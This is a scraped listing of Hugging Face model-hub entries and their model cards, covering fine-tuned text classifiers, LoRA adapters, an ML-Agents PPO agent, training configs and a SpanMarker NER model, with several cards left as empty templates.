migueldeguzmandev/phi-1.5_paperclipmaximizer_v2 | migueldeguzmandev | 2024-01-22T03:51:13Z | 88 | 0 | transformers | [
"transformers",
"pytorch",
"phi",
"text-generation",
"custom_code",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-12-11T03:42:56Z | [Research Log: RLFCV2, Petertodd, the paperclip maximizer](https://www.lesswrong.com/posts/doLkRMasXMKyafJrz/research-log-rlfcv2-training-phi-1-5-gpt2xl-and-falcon-rw-1b)
|
migueldeguzmandev/paperclip-falcon-rw-1b-3 | migueldeguzmandev | 2024-01-22T03:50:41Z | 11 | 0 | transformers | [
"transformers",
"pytorch",
"falcon",
"text-generation",
"custom_code",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-12-19T07:32:00Z | [Research Log: RLFCV2, Petertodd, the paperclip maximizer](https://www.lesswrong.com/posts/doLkRMasXMKyafJrz/research-log-rlfcv2-training-phi-1-5-gpt2xl-and-falcon-rw-1b)
|
migueldeguzmandev/paperclip_falcon-rw-1b | migueldeguzmandev | 2024-01-22T03:50:16Z | 10 | 0 | transformers | [
"transformers",
"pytorch",
"falcon",
"text-generation",
"custom_code",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-12-19T02:31:08Z | [Research Log: RLFCV2, Petertodd, the paperclip maximizer](https://www.lesswrong.com/posts/doLkRMasXMKyafJrz/research-log-rlfcv2-training-phi-1-5-gpt2xl-and-falcon-rw-1b)
|
Andyrasika/lora_collection | Andyrasika | 2024-01-22T03:47:14Z | 0 | 3 | null | [
"license:creativeml-openrail-m",
"region:us"
] | null | 2023-09-24T17:20:42Z | ---
license: creativeml-openrail-m
---
LORA:
- https://civitai.com/models/124347/xlmoreart-full-xlreal-enhancer
- https://civitai.com/models/120663?modelVersionId=131991
- https://civitai.com/models/6526/studio-ghibli-style-lora
- https://civitai.com/models/117041/wowifierxl
- https://civitai.com/models/122359/detail-tweaker-xl
- xl_real/Enhancer - https://civitai.com/models/124347/xlmoreart-full-xlreal-enhancer
Model
- https://civitai.com/models/25694/epicrealism
- https://civitai.com/models/119229/zavychromaxl
- https://civitai.com/models/118913/sdxl-10-arienmixxl-asian-portrait
- https://civitai.com/models/76489/sdxl-yamers-anime-ultra-infinity
- https://civitai.com/models/84040/sdxl-unstable-diffusers-yamermix
LCM
- https://huggingface.co/bluepen5805/blue_pencil-XL/blob/main/blue_pencil-XL-v1.0.0-lcm.safetensors
Music:
- https://civitai.com/models/1619?modelVersionId=1762
 |
StarkWizard/llama-2-7b-cairo-trained-PEFT | StarkWizard | 2024-01-22T03:40:40Z | 2 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:codellama/CodeLlama-7b-Instruct-hf",
"base_model:adapter:codellama/CodeLlama-7b-Instruct-hf",
"region:us"
] | null | 2024-01-21T13:44:23Z | ---
library_name: peft
base_model: codellama/CodeLlama-7b-Instruct-hf
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.7.1 |
sowbaranika13/vit-base-patch16-224-finetuned-flower | sowbaranika13 | 2024-01-22T03:11:46Z | 147 | 0 | transformers | [
"transformers",
"pytorch",
"vit",
"image-classification",
"generated_from_trainer",
"dataset:imagefolder",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | image-classification | 2024-01-20T21:40:28Z | ---
license: apache-2.0
tags:
- generated_from_trainer
datasets:
- imagefolder
model-index:
- name: vit-base-patch16-224-finetuned-flower
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# vit-base-patch16-224-finetuned-flower
This model is a fine-tuned version of [google/vit-base-patch16-224](https://huggingface.co/google/vit-base-patch16-224) on the imagefolder dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
### Framework versions
- Transformers 4.24.0
- Pytorch 2.1.0+cu121
- Datasets 2.7.1
- Tokenizers 0.13.3
|
duy221/my_awesome_model | duy221 | 2024-01-22T03:11:15Z | 5 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-18T10:02:13Z | ---
license: apache-2.0
base_model: distilbert-base-uncased
tags:
- generated_from_trainer
model-index:
- name: my_awesome_model
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# my_awesome_model
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
sebasgaviria79/ielts-grading-regression | sebasgaviria79 | 2024-01-22T03:09:41Z | 31 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"roberta",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilroberta-base",
"base_model:finetune:distilbert/distilroberta-base",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-22T02:57:05Z | ---
license: apache-2.0
base_model: distilroberta-base
tags:
- generated_from_trainer
model-index:
- name: ielts-grading-regression
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# ielts-grading-regression
This model is a fine-tuned version of [distilroberta-base](https://huggingface.co/distilroberta-base) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 1
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.0.0
- Datasets 2.16.1
- Tokenizers 0.15.0
|
thangvip/vi-t5-reward-model-2-epochs | thangvip | 2024-01-22T03:08:15Z | 5 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text-classification",
"generated_from_trainer",
"base_model:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"base_model:finetune:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-22T03:07:42Z | ---
license: mit
base_model: thangvip/vi-t5-base-finetune-rewriter-5-epochs
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: vi-t5-reward-model-2-epochs
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# vi-t5-reward-model-2-epochs
This model is a fine-tuned version of [thangvip/vi-t5-base-finetune-rewriter-5-epochs](https://huggingface.co/thangvip/vi-t5-base-finetune-rewriter-5-epochs) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.5029
- Accuracy: 0.7577
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1.41e-05
- train_batch_size: 32
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
intervitens/internlm2-limarp-lora | intervitens | 2024-01-22T03:07:12Z | 5 | 1 | peft | [
"peft",
"llama",
"generated_from_trainer",
"base_model:intervitens/internlm2-base-20b-llama",
"base_model:adapter:intervitens/internlm2-base-20b-llama",
"8-bit",
"bitsandbytes",
"region:us"
] | null | 2024-01-22T03:05:46Z | ---
library_name: peft
tags:
- generated_from_trainer
base_model: intervitens/internlm2-base-20b-llama
model-index:
- name: internlm-limarp-lora
results: []
---
Don't use this yet, there's a problem with the llamafied internlm2 tokenizer.
Prompt format: ChatML.
[<img src="https://raw.githubusercontent.com/OpenAccess-AI-Collective/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/OpenAccess-AI-Collective/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.3.0`
```yaml
base_model: /data/internlm2-base-20b-llama
model_type: LlamaForCausalLM
tokenizer_type: LlamaTokenizer
is_llama_derived_model: true
load_in_8bit: true
load_in_4bit: false
strict: false
datasets:
- path: /data/train-all-8k.jsonl
type: completion
dataset_prepared_path:
val_set_size: 0.05
output_dir: /data/internlm-limarp-lora-out
sequence_len: 8192
sample_packing: true
pad_to_sequence_len: true
adapter: lora
lora_model_dir:
lora_r: 128
lora_alpha: 64
lora_dropout: 0.05
lora_target_linear: true
lora_fan_in_fan_out:
gradient_accumulation_steps: 4
micro_batch_size: 2
num_epochs: 4
optimizer: adamw_bnb_8bit
lr_scheduler: cosine
learning_rate: 0.00002
train_on_inputs: false
group_by_length: false
bf16: true
fp16: false
tf32: false
gradient_checkpointing: true
gradient_checkpointing_kwargs:
early_stopping_patience:
resume_from_checkpoint:
local_rank:
logging_steps: 1
xformers_attention:
flash_attention: true
s2_attention:
warmup_steps: 10
evals_per_epoch: 4
eval_table_size:
eval_table_max_new_tokens: 128
saves_per_epoch: 1
debug:
deepspeed:
weight_decay: 0.0
fsdp:
fsdp_config:
special_tokens:
bos_token: "<s>"
eos_token: "</s>"
unk_token: "<unk>"
```
</details><br>
# internlm-limarp-lora
This model was trained from scratch on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 2.1216
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
The following `bitsandbytes` quantization config was used during training:
- quant_method: bitsandbytes
- load_in_8bit: True
- load_in_4bit: False
- llm_int8_threshold: 6.0
- llm_int8_skip_modules: None
- llm_int8_enable_fp32_cpu_offload: False
- llm_int8_has_fp16_weight: False
- bnb_4bit_quant_type: fp4
- bnb_4bit_use_double_quant: False
- bnb_4bit_compute_dtype: float32
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 10
- num_epochs: 4
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| 2.3563 | 0.01 | 1 | 2.3995 |
| 2.1815 | 0.25 | 37 | 2.2693 |
| 2.1364 | 0.51 | 74 | 2.1684 |
| 2.1355 | 0.76 | 111 | 2.1526 |
| 2.1624 | 1.03 | 148 | 2.1435 |
| 2.1326 | 1.28 | 185 | 2.1367 |
| 1.9987 | 1.54 | 222 | 2.1330 |
| 2.0494 | 1.79 | 259 | 2.1291 |
| 2.0505 | 2.04 | 296 | 2.1266 |
| 2.075 | 2.3 | 333 | 2.1243 |
| 2.0183 | 2.55 | 370 | 2.1229 |
| 2.1047 | 2.81 | 407 | 2.1227 |
| 2.1309 | 3.06 | 444 | 2.1218 |
| 2.1249 | 3.31 | 481 | 2.1214 |
| 2.1423 | 3.57 | 518 | 2.1214 |
| 2.0913 | 3.82 | 555 | 2.1216 |
### Framework versions
- PEFT 0.7.0
- Transformers 4.37.0.dev0
- Pytorch 2.0.1+cu118
- Datasets 2.16.1
- Tokenizers 0.15.0
|
carlois0708/chatfinanciero | carlois0708 | 2024-01-22T03:03:04Z | 0 | 0 | null | [
"finance",
"license:apache-2.0",
"region:us"
] | null | 2024-01-22T03:01:50Z | ---
license: apache-2.0
tags:
- finance
--- |
scansiz/breast_bus-lora | scansiz | 2024-01-22T03:00:44Z | 0 | 0 | diffusers | [
"diffusers",
"safetensors",
"stable-diffusion",
"stable-diffusion-diffusers",
"text-to-image",
"lora",
"base_model:runwayml/stable-diffusion-v1-5",
"base_model:adapter:runwayml/stable-diffusion-v1-5",
"license:creativeml-openrail-m",
"region:us"
] | text-to-image | 2024-01-20T18:55:13Z |
---
license: creativeml-openrail-m
base_model: runwayml/stable-diffusion-v1-5
tags:
- stable-diffusion
- stable-diffusion-diffusers
- text-to-image
- diffusers
- lora
inference: true
---
# LoRA text2image fine-tuning - scansiz/breast_bus-lora
These are LoRA adaption weights for runwayml/stable-diffusion-v1-5. The weights were fine-tuned on the scansiz/breast_bus dataset. You can find some example images in the following.




|
io-roboto/ppo-SnowballTarget | io-roboto | 2024-01-22T02:55:32Z | 12 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"SnowballTarget",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SnowballTarget",
"region:us"
] | reinforcement-learning | 2024-01-22T02:55:30Z | ---
library_name: ml-agents
tags:
- SnowballTarget
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SnowballTarget
---
# **ppo** Agent playing **SnowballTarget**
This is a trained model of a **ppo** agent playing **SnowballTarget**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how works ML-Agents:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: io-roboto/ppo-SnowballTarget
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
Mehrabbz/sbehavior | Mehrabbz | 2024-01-22T02:44:45Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2024-01-21T22:44:15Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Benson/llama-2-7b-miniguanaco-test | Benson | 2024-01-22T02:34:05Z | 0 | 0 | peft | [
"peft",
"safetensors",
"llama",
"arxiv:1910.09700",
"base_model:mlabonne/llama-2-7b-miniguanaco",
"base_model:adapter:mlabonne/llama-2-7b-miniguanaco",
"region:us"
] | null | 2024-01-22T02:01:43Z | ---
library_name: peft
base_model: mlabonne/llama-2-7b-miniguanaco
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.7.1 |
Yeji-Seong/distilbert-base-uncased-textclassification_ptuning | Yeji-Seong | 2024-01-22T02:22:37Z | 4 | 0 | peft | [
"peft",
"tensorboard",
"safetensors",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:adapter:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"region:us"
] | null | 2024-01-15T05:44:59Z | ---
license: apache-2.0
library_name: peft
tags:
- generated_from_trainer
metrics:
- accuracy
base_model: distilbert-base-uncased
model-index:
- name: distilbert-base-uncased-textclassification_ptuning
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# distilbert-base-uncased-textclassification_ptuning
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2493
- Accuracy: 0.8983
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 0.2545 | 1.0 | 1563 | 0.2501 | 0.8978 |
| 0.2592 | 2.0 | 3126 | 0.2493 | 0.8983 |
### Framework versions
- PEFT 0.7.1
- Transformers 4.36.2
- Pytorch 2.0.0+cu117
- Datasets 2.16.1
- Tokenizers 0.15.0 |
zhang19991111/specter2-spanmarker-STEM-NER | zhang19991111 | 2024-01-22T02:22:03Z | 4 | 0 | span-marker | [
"span-marker",
"safetensors",
"token-classification",
"ner",
"named-entity-recognition",
"generated_from_span_marker_trainer",
"en",
"base_model:allenai/specter2_base",
"base_model:finetune:allenai/specter2_base",
"license:cc-by-sa-4.0",
"model-index",
"region:us"
] | token-classification | 2024-01-22T02:20:58Z | ---
language: en
license: cc-by-sa-4.0
library_name: span-marker
tags:
- span-marker
- token-classification
- ner
- named-entity-recognition
- generated_from_span_marker_trainer
metrics:
- precision
- recall
- f1
widget:
- text: Altitude measurements based on near - IR imaging in H and Hcont filters showed
that the deeper BS2 clouds were located near the methane condensation level (
≈1.2bars ) , while BS1 was generally ∼500 mb above that level ( at lower pressures
) .
- text: However , our model predicts different performance for large enough memory
- access latency and validates the intuition that the dynamic programming algorithm
performs better on these machines .
- text: We established a P fertilizer need map based on integrating results from the
two systems .
- text: Here , we have addressed this limitation for the endodermal lineage by developing
a defined culture system to expand and differentiate human foregut stem cells
( hFSCs ) derived from hPSCs . hFSCs can self - renew while maintaining their
capacity to differentiate into pancreatic and hepatic cells .
- text: The accumulated percentage gain from selection amounted to 51%/1 % lower Striga
infestation ( measured by area under Striga number progress curve , ASNPC ) ,
46%/62 % lower downy mildew incidence , and 49%/31 % higher panicle yield of the
C5 - FS compared to the mean of the genepool parents at Sadoré / Cinzana , respectively
.
pipeline_tag: token-classification
base_model: allenai/specter2_base
model-index:
- name: SpanMarker with allenai/specter2_base on my-data
results:
- task:
type: token-classification
name: Named Entity Recognition
dataset:
name: my-data
type: unknown
split: test
metrics:
- type: f1
value: 0.6906354515050167
name: F1
- type: precision
value: 0.7108433734939759
name: Precision
- type: recall
value: 0.6715447154471544
name: Recall
---
# SpanMarker with allenai/specter2_base on my-data
This is a [SpanMarker](https://github.com/tomaarsen/SpanMarkerNER) model that can be used for Named Entity Recognition. This SpanMarker model uses [allenai/specter2_base](https://huggingface.co/allenai/specter2_base) as the underlying encoder.
## Model Details
### Model Description
- **Model Type:** SpanMarker
- **Encoder:** [allenai/specter2_base](https://huggingface.co/allenai/specter2_base)
